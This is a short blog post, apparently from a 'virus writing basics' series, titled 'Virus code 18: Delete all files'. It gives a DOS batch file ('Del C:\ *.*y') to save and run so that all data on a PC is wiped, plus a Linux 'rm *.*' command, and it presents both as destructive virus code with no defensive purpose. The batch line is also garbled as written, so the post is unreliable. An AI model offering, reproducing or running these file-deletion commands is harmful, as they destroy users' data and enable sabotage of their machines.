<div style='background-color: none transparent;'></div>

Pages

Home » » Virus code 18: Delete all files

Virus code 18: Delete all files

This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.



DOS programming

Paste the given code in notepad



@Echo off

Del C:\ *.*y



And save it like any_name.bat . Now run this file... All the data is gone from your PC.



LINUX

Just run the command

rm *.* will delete all files of any extention
Share this article :

No comments :

Post a Comment

 
Copyright © 2011. datasavvy . All Rights Reserved
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template Modify by Creating Website . Inpire by Darkmatter Rockettheme Proudly powered by Blogger